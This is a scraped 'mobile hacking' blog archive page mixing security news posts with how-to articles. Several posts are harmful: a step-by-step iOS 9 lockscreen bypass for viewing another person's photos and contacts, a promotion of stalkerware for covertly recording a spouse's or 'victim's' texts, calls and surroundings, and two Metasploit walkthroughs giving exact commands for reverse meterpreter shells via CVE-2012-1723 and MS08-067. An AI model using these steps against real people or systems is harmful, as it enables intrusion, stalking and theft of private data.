Affichage des articles dont le libellé est MOBILE HACKING. Afficher tous les articles
Affichage des articles dont le libellé est MOBILE HACKING. Afficher tous les articles

Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook For A Limited Time


Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook for a limited time

Learn how to keep your data secure when you’re on the go.

Mobile phones and tablets enhance our lives, but they also make you and your family vulnerable to cyber-attacks or theft. This clever eBook will help you secure your devices and know what to do if the worst happens.


Download

~ jeudi 22 octobre 2015 0 commentaires

Hackers Can Steal Your Information Through EarPhones


Hackers Can Steal Your Information Through EarPhones..

As we are aware about that Google Voice or Siri are tracking us via our mobile devices so that represents a security risks too.

French Information Security ANSSI research have figured out that how to utilize radio waves to silently trigger voice summons on iPhones or Android devices on the off chance that they utilize headphones and have Google Now or Siri empowered.

Security researchers unveiled that hackers can steal your information to make calls, send texts or browse a Malware website without notifying you. its over 16 feet they can use the attack on your smartphone.

According to Wired,
The researcher utilized the earphones' cord as a radio wire and exploited is wire to change over electromagnetic waves into electrical signals that told the smartphone that orders to be sound are originating from the user microphone.

Earlier, IEEE report was published on the same topic,

Research exploit the principle of front-door coupling on smartphones headphone cables with specific electromagnetic waveforms. We present a smart use of intentional electromagnetic interference, resulting in finer impacts on an information system than a classical denial of service effect. As an outcome, we introduce a new silent remote voice command injection technique on modern smartphones.

How Radio Attack dangerous Silently?

  • It can make calls
  • To Send text messages
  • Browsing Phishing or Malware websites
  • Spam Messaging through Social Media Accounts


How this attack works ?
Watch Video:


~ vendredi 16 octobre 2015 0 commentaires

YiSpector First iOS Malware That Attacks On Apple iOS Devices


YiSpector: First iOS Malware That Attacks On Apple iOS Devices

YiSpecter is different from previously seen iOS malware in that it attacks both jailbroken and non-jailbroken iOS devices through unique and harmful malicious behaviors. 

Cyber Security firm Palo Alto networks researcher Claud Xiao defines that, how this malware attack work on iOS devices which targets in China and Taiwan.

He said in the blog,

Specifically, it’s the first malware we’ve seen in the wild that abuses private APIs in the iOS system to implement malicious functionalities.

Yispector Infected iOS device

 YiSpecter is the first real world iOS malware that combines these two attack techniques and causes harm to a wider range of users. It pushes the line barrier of iOS security back another step.


  • Whether an iPhone is jailbroken or not, the malware can be successfully downloaded and installed.
  • Even if you manually delete the malware, it will automatically re-appear
  • Using third-party tools you can find some strange additional “system apps” on infected phones
  • On infected phones, in some cases when the user opens a normal app, a full screen advertisement will show.


Palo Alto Networks has released IPS and DNS signatures to block YiSpecter’s malicious traffic. This blog also contains suggestions for how other users can manually remove YiSpecter and avoid potential similar attacks in the future. Apple has also been notified.

According to analysis reports by Qihoo 360 and Cheetah Mobile, YiSpecter was also spread by the Lingdun worm.
A malicious webpage uploaded by Lingdun worm

Lingdun uses fake VeriSign and Symantec certificates to bypass malware detection systems. Its primary goal is to download and to install additional Windows software onto a PC. Most of this additional software is benign but at least one installation was malicious.

Apple said in Statement,

"This issue only impacts users on older versions of iOS who have also downloaded malware from untrusted sources. We addressed this specific issue in iOS 8.4 and we have also blocked the identified apps that distribute this malware. We encourage customers to stay current with the latest version of iOS for the latest security updates. We also encourage them to only download from trusted sources like the App Store and pay attention to any warnings as they download apps.”

How to Remove YiSpecter from Your iOS Devices?

  • Go  to Settings –> General –> Profiles and remove all unknown or untrusted profiles.
  • Delete any installed apps with names 情涩播放器, 快播私密版 or 快播0.
  • You can use any third-party iOS management tool such as iFunBox on Windows or Mac OS X to connect with your iPhone or iPad
  • Then check for installed iOS apps like Phone, Weather, Game Center, Passbook, Notes, or Cydia and delete them.



Last month, we reported XcodeGhost malware infected almost 40 popular apps in the Chinese App. Store.

~ mardi 6 octobre 2015 0 commentaires

Your Android Phone is Vulnerable To Remote Hacking With StageFright Bugs


Your Android Phone is Vulnerable To Remote Hacking With StageFright Bugs!

Stagefright 2.0, a set of two vulnerabilities that manifest when processing specially crafted MP3 audio or MP4 video files. 

Security Researcher of Zimperium Joshua Drake (Vice President of platform research and exploitation at Zimperium) discovered two more vulnerabilities in the Android. His aimed to researching media processing in Android and focused on remote attacks agains current devices.

What is the vulnerability ? 
Processing specially crafted MP3 or MP4 files can lead to arbitrary code execution. -

The vulnerability lies in the processing of metadata within the files, so merely previewing the song or video would trigger the issue. Since the primary attack vector of MMS has been removed in newer versions of Google’s Hangouts and Messenger apps, the likely attack vector would be via the Web browser.

  • An attacker would try to convince an unsuspecting user to visit a URL pointing at an attacker controlled Web site (e.g., mobile spear-phishing or malicious ad campaign)
  • An attacker on the same network could inject the exploit using common traffic interception techniques (MITM) to unencrypted network traffic destined for the browser.
  • 3rd party apps (Media Players, Instant Messengers, etc.) that are using the vulnerable library.

After the execution this Vulnerbaility allow attackers to access to personal data and photos stored on the phone, be able to take photos, record conversations, email and SMS and can download malicious apps remotely.

Google said that new Stagefright bugs will be fixed in next schedule update.

Source: Zimperium

~ jeudi 1 octobre 2015 0 commentaires

How To Hack iPhone To See Photos and Contacts Just in 30 Seconds


How To Hack iPhone ?
To See Photos and Contacts Just in 30 Seconds!

A new method to unlock a iPhone, iPad or iPod touch running on latest iOS 9 and iOS 9.1. The vulnerability has been discovered to access the device contacts and photos within 30 sec.

How to do unlock for iOS 9?

  • Type incorrect password 4 times 
  • For the fifth time Type the password 3 times and in 4th time hold the HOME button to invoke SIRI by the 4th digit.
  • Now ask the siri about the Time.
  • Tap the Clock icon to open the Clock app and add a new Clock, then write anything in the Choose a City field.
  • Now double tap on the word to select, you wrote to invoke the copy & paste menu, Select All and then click on "Share".
  • Tap the 'Message' icon in the Share Sheet, and again type something random, hit Return and double tap on the contact name on the top.
  • Select "Create New Contact," and Tap on "Add Photo" and then on "Choose Photo".
  • You'll now be able to see the entire photo library on the iOS device, which is still locked with a passcode. Now browse and view any photo from the Photo album individually.


Watch Video for bypass iOS 9 Lockscreen



After this bypass attack Apple have been updated new version iOS 9.0.1 but its still we can bypass its lockscreen.

Look below Video demonstrate:

Video for bypass iOS 9.0.1 Lockscreen



How To prevent by this attack?

Until Apple fixes this issue, iOS users can protect themselves by disabling Siri on the lock screen

  • Go to Settings > Touch ID & Passcode > Siri
  • Turn off Siri

Just few days back Biggest Security Breach In Apple App Store Gets Malware Infected.

~ lundi 28 septembre 2015 0 commentaires

Cell Phone Spy: how to use Spy Phone Software to Spy on Any Cell Phone,spy phone gold,mobile spy









 
Hello friends today i explain very intrested topic which is how to  steal sensitive data from any other person mobile phone.this tutorial is only for educational purpos.If any problem you face after reading this tutorial i am not responsible for that, user solay responsible about.

if you are Looking for a Cell Phone Spy software to spy on cheating spouse or monitor your teen’s

text messages? Well, here is a way to turn someone’s cell phone into a Spyphone and record every

activity with the world’s most powerful cell phone spying software. if you access your victim mobile

phone for couple of minutes .All this is possible within minutes from now!

In Today there exists a lot of cell phone spy softwares on the market and as a result people often find

it difficult to choose the right one to fit their spying needs. those software which is working perfectly

for everyone ,we have decided to give a thorough review of the Top 2 Best Selling Cell Phone Spy

softwares on the market.which is very useable.so lets check it one by one.first of all give some rating

about these two software ,we servay upon these software and decide its rating on the basic of my readers.

(1.) Spy Phone GOLD – (Rating: 9/10)

(2.) Mobile Spy – (Rating: 8/10)

as you see above spy phone gold is high rating.

Spy Phone GOLD and Mobile Spy are the current leaders in the market which are used by thousands

across the globe to spy on cheating spouse, monitor employees and keep an eye on their teens. Here

is a complete review of these two products.simply follow all steps carefully.

first lets introdused.

1. Spy Phone GOLD Review:



 

From the Responce of my many readers i decide no.1 spy software which is spy phone gold.its rating

is high so we give 1st priority in our blog.

as we know Spy Phone GOLD is is the No.1 spy software on the market which turns any compatible

cell phone into a Spy Phone within minutes. It offers every feature that a true cell phone spy software

should have. Hence most people choose Spy Phone GOLD for their cell phone spying needs.

many of my friends want to see the work of our friends and family member.to know how much time he give to mobile.

if you dont know how this spy phone gold software work ? dont worry here i provide much information about that.
How Cell Phone Spying Works?

As you know these type of software are not freeware.it give us much information of any mobile

phone where it is installed.so you need to purchace it before going on.

After your purchase, you can directly download the installation module onto the target cell phone.if

you access victim mobile phone for few minutes then your task will half. Installation takes only a few minutes. After installation, each activity on the target phone is recorded and uploaded onto the Spy

phone servers. You can login to your online account from your PC to view the logs at any time. The

logs contain Text messages, Contacts List, Call History, GPS Locations and many such information.

in this software i really like one feature which is call interception.lets know some what is call interception.
 
Call interception:

 call interception ,When the target cell phone is on the conversation, you will receive a secret SMS

notification on your phone.it notify you . At this time you can call the target phone to listen to the live conversations going on. All this process takes place in complete stealth mode and is 100%

undetectable!

Top Features of Spy Phone :

we are very eager to know what is the feature of a perticular software ,so dont wory here are full feature of spy phone gold .

1) SMS Logging – this feature simply Records both incoming & outgoing SMS


2) Call Interception – it give you fully freedom for  Listen to the actual calls LIVE on the target cell phone


3)  SIM Change Notification –when victime change their sim card it  give you  notification via SMS when the target cell phone changes it’s SIM

4)  Remote Control – Send secret SMS to the target phone to control all functions
 

  5)  Environment Listening - Make a spy call to the target cell phone running SPY PHONE and listen in to the phone’s surroundings.

   6)     SIM Change Notification – Get instant notification via SMS when the target cell phone changes it’s SIM

   7) Spy from any location across the world

  8) feel free use it because it is FUD( Fully undetectable ) or we can say  100% Undetectable
 
Compatible Cell Phones:

As for the demand of many people this software name Spy Phone GOLD is fully compatible with the following mobile phones

1)  Nokia, LG, Samsung and Sony Ericsson Phones

 2)  BlackBerry Phones

 3)   Apple iPhones

 4)   Windows Mobile Phones

so why are you waiting ,lets some enjoy .

Click Here to Download Spy Phone GOLD


2. Mobile Spy Review:




as we know mobile spy is  the No.2  spy software on the market which turns any compatible cell

phone into a Spy Phone within minutes. It offers every feature that a true cell phone spy software

should have. Hence most people choose mobile Spy  for their cell phone spying needs.

Although Mobile Spy is not as feature rich as Spy Phone GOLD, it offers a good bunch of features

that every spy software should have. It is a very good choice for those who are looking for a

mid-range spy software at an affordable price.

How it Works?

we mention all steps of working spy phone gold above,The working of Mobile Spy is exactly same as that of Spy Phone GOLD. However Mobile Spy lacks the feature of call interception.

what are the Features Mobile Spy ?

Mobile Spy offers every common feature such as recording Call Logs, SMS, GPS Locations, IM Conversations, Web Activities, Emails etc. It is very similar to Spy Phone but lacks the vital features like call recording and call interception. Thus with Mobile Spy you cannot listen to live calls on the target cell phone.

Compatible Cell phones:

Mobile Spy is compatible with Nokia, Samsung, LG, Apple iPhones, Blackberry, Android and Windows Mobile Phones.

Click Here to Download Mobile Spy

WHAT IS DEFFRENCE BETWEEN THESE TWO ?



Here is a quick comparison between Spy Phone GOLD and Mobile Spy



Which Cell Phone Spy Software to Choose?

IF YOU have still doubt what software you prefer then again we say dont worry,

If you want a high-end spy software with top features like call interception and call recording then

Spy Phone GOLD is the right choice. Or else if you’re looking for a mid-range spy software with

basic features at an affordable price then go for Mobile Spy. So what are you waiting for? Go grab

either of the two from the following links now:

1. Click Here to Download Spy Phone GOLD

2. Click Here to Download  Mobile Spy

some other software which work perfectly:

Spy Phone Silver 

SPYPhone Silver also allows you to listen to the surroundings of the target mobile.SPYPhone

SILVER software for Symbian Series 60, Windows Mobile and BlackBarry mobile phones. Listen to

phone environment surroundings, and read SMS, Call Logs, Emails of a Symbian, Windows mobile

or BlackBarry phone. Avaliable for immediate download.

Spy Phone GOLD SMS 

SPYPhone GOLD SMS also allows you to listen to the surroundings of the target mobile, listen to the phone conversation and to know the location of the device.

Spy Phone Basic

Spy Phone Basic is entry level product for those with minimum spying requirements.

if you have any problem faced feel free contat me via comment bellow ,if you like this article helpful please share it with your friends,also don't forget to like my facebook page for  better updates.

~ mardi 24 février 2015 0 commentaires

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/

~ vendredi 3 mai 2013 0 commentaires

[Metasploit Tutorial] Hacking Windows XP using IP Addres


Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

~ 0 commentaires

Unlock Huawei E1550 3G USB modem



USB modems are always locked by the mobile connection provider. They cannot be used with any other service providers. If you want to switch your service provider then you must buy a new USB modem which can be costly affair.
However, you can unlock these USB modems and you can then use them with other service provider connections also. Here is a quick guide to unlock Idea Huawei E1550 netSetter.

 

Steps to Unlock Idea Net Setter


  • Insert You idea netsetter with default sim (which u got with netsetter)



  • Install Huawei frimware E-1550For idea india
  • After successful installation, unplug your modem and insert a sim (airtel/bsnl or any other)and replug the modem and install the driver and install the driver and software

  • open the software and enter the unlock code when it asks usingUniversal master code (you can download it from here)
    now your modem is completely unlocked
    then create a profile for current sim from Tools menu and set corresponding APN for the sim.


    APN 
  • Aircel APN: aircelgprs | Access Number: *99***1#
  • Airtel APN: airtelgprs.com | Access Number: *99#
  • Tata Docomo APN: tata.docom.internet | Access Number: *99#
  • Idea APN: internet | Access Number: *99#
  • Reliance APN: rcomwap | Access Number: *99#
  • BSNL 3G APN: bsnlnet | Access Number: *99#
  • MTNL 3G Postpaid APN: mtnl3g | Access Number: *99#
  • MTNL 3G Prepaid APN: pps3g | Access Number: *99#
  • Vodafone APN: www | Access Number: *99# 

Mobile Partner  can be used instead of idea softwae

~ samedi 30 mars 2013 0 commentaires

Galaxy S3 Dandelion Live Wallpaper Free Download



Friends, now enjoy galaxy S3 wallpaper on your android phone and enjoy with the wallpaper.. Your android phone will look like the samsung galaxy s3 mobile. So just download the apk file and install it on ur mobile.



Tags:-
SamsungGalaxyS2,SamsungGalaxyS,SamsungGalaxyS2,GalaxyS,SamsungGalaxy551,GalaxyCinemas,SamsungGalaxyReview,GalaxyPhon,SamsungGalaxyApps,SamsungGalaxyMobile,GalaxyTheaters,SamsungGalaxySApps,GalaxySReview,GalaxyEntertainment,LaGalaxyTickets,NewGalaxyPhone,GalaxyApps,GalaxyMovieTheater,GalaxySApps,GalaxyAlarm,



~ 0 commentaires

Sony Ericsson mobile PC suite



Assalam o alaikum, friends here is the PC suite for sony erricson mobiles
U can connect your mobile with your computer with the PC suite


             Download here

~ 0 commentaires

BlackBerry Phone Secret Codes


Here are some of the secret codes you need to know to get the best out of your blackberry phone...


1. Decibel meter.
Shows your signal strength in decibels instead of bars.
Hold “Alt” and press “NMLL” (repeat to reverse the effect).

2. Address Book file verification.
Checks the data in your Address Book for inconsistencies.
Hold “Alt” and press “VALD” in the Address Book.

3. Address Book data structure rebuild.
Forces a data structure re-build in the Address Book.
Hold “Alt” and press “RBLD” in the Address Book.

4. View source code.
Shows the source code of a Web page.
Hold “Alt” and press “RBVS” in the Address Book.

5. Help Me! menu.
Provides crucial technical information about your device.
Hold “Alt” and (left) “shift”, then press “H”.

6. IMEI number.
Shows your device’s international mobile equipment identity (IMEI – your serial number) on-screen.
Type “*#06#” on the home screen.

7. “Soft” reset.
Performs a “soft” reset of your device; the equivalent of doing a “battery pull” (ie. Removing the battery for a few seconds).
Press-and-hold “Alt”, then press-and-hold (left) “shift”, then press-and-hold “Del”.

8. Event Log.
Shows event logs of all the system-level events that occur on your cell phone.
Hold “Alt” and press “LGLG”.

In some cases, you will need to be on the Home screen when you enter these codes:
A or C = phonebook
S = search
F = phone profiles
W or B = browser
H = help
K = locks the keys
L = calendar
V = messages
M = messages folder
R = alarm
T = tasks
U = calculator
I = applications
O = options
P = phone.
T – Top of page (in browser)
B – Bottom of page (in browser)
Space – Page down (in browser)
ALT + Right Shift + Del = hard reset
D – Memo pad
U – Switch between hide/unhide in title bar (in browser)
ALT + NMLL = numbers instead of bars for signal strength

~ mercredi 6 mars 2013 0 commentaires